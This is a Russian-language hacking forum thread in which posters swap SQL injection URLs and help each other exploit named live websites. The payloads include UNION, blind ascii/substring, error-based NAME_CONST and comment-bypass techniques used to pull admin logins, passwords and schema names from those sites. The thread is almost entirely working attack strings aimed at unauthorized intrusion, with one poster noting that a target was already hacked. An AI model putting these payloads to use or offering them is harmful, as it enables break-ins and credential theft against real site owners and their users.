http://www.site.ru/index.php?id=106 and substring(@@version,1,1)=5 без ошибок - следовательно 5 версия. R1dex мне подсобил уже с этой скулей, вот такой запрос работает 24 and 1=0 union select 1,2,3,4,5,6,7,9,null,10 Собственно вот: http://www.mibf.ru/index.php?id=24 and 1 =0 union select 1,2,3,4,5,6,7,9,0x3a,10-- 1 сейчас проверил, оказалось его уже вскрыли раньше меня
вот такая трабла: http://www.koisite.info/view_profile1.php?user=-2653%27+union+select+version%28%29+from+admin+limit+0,1+--+ выводит версию в строку - 2004-00-27 даты то есть вывод числовых значений без проблем теперь пробуем вывести имя: http://www.koisite.info/view_profile1.php?user=-2653'+union+select+loginname+from+admin+limit+0,1+--+ выводит 0000-00-00 думал попробовать покрутить через подзапросы, не не тут то было http://www.koisite.info/view_profile1.php?user=2653%27+and%20substring%28version%28%29,1,1%29=4+--+ выводит профиль http://www.koisite.info/view_profile1.php?user=2653%27+and+ascii%28substring%28%28select%20pwd%20from%20admin+limit+0,1%29,1,1%29%29%3E0+--+ ругается и обрезает все что идет до select http://www.koisite.info/view_profile1.php?user=2653%27+and+ascii%28substring%28%28/*!select*/%20pwd%20from%20admin+limit+0,1%29,1,1%29%29%3E0+--+
Помогите раскрутить слепую sql: http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select pass FROM users LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select pass FROM users LIMIT 1), 14)e) b)a--+ Не выводит не одно из полей, не login, не password, ничего короче, помогите пожалуйста.
http://www.ollis.ru/index.php?rest=1')+or+1+group+by+concat(version(),floor(rand(0)*2))having+min(0)+or+1--+ Duplicate entry '5.0.221' for key 1
http://ollis.ru/index.php?id=S00000645')+union+select * FROM (select * FROM (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=database() LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select table_name FROM information_schema.tables+where+table_schema=database() LIMIT 1), 14)e) b)a--+&type=ollis_picture&action=&mode=popup перебирай лимит ом
Просто лимит 1 потом 2 и т.д.? Не догнал... Делаю так http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select user FROM _access LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select user FROM _access LIMIT 1), 14)e) b)a--+ гонит Unknown column 'user' in 'field list' побывал и логин и много чего
Хватит уже тыкать таблицы и колонки наугад. У тебя 5-ая ветка, ничего подбирать не надо, просто почитай хоть одну статью... Колонки в таблице _access http://ollis.ru/index.php?id=S00000645')+union+select * FROM (select * FROM (select NAME_CONST((select column_name FROM information_schema.columns+where+table_name=0x5f616363657373 LIMIT 0,1), 14)d) as t JOIN (select NAME_CONST((select column_name FROM information_schema.columns+where+table_name=0x5f616363657373 LIMIT 0,1), 14)e) b)a--+&type=ollis_picture&action=&mode=popup Ну и: http://www.ollis.ru/index.php?rest=-1') union select * FROM (select * FROM (select NAME_CONST((select user_id FROM _access LIMIT 1), 14)d) as t JOIN (select NAME_CONST((select user_id FROM _access LIMIT 1), 14)e) b)a--+
Нужна помощь,здесь есть иньекция http://steroidanabolic.com/phpBB/privmsg.php?mode='%22%5C'%5C%22);|]*{%0d%0a%3C%00%3E&u=186 http://steroidanabolic.com/phpBB/viewforum.php?f=1&start=-268435455
ну лан палит то палим линк главное найти хот какую решение: http://www.nz.adultxdating.com/search_get.html POST txt_user_sex=2&txt_agefrom=20&txt_ageto=25&search_submit.x=52&search_submit.y=14&sel_state_id=12&txt_seeking_sex%5B%5D=1' Это уже посмотрел профи и пока ниче может народ что скажет (много мозгов)? В первые встречаю такой гемор.
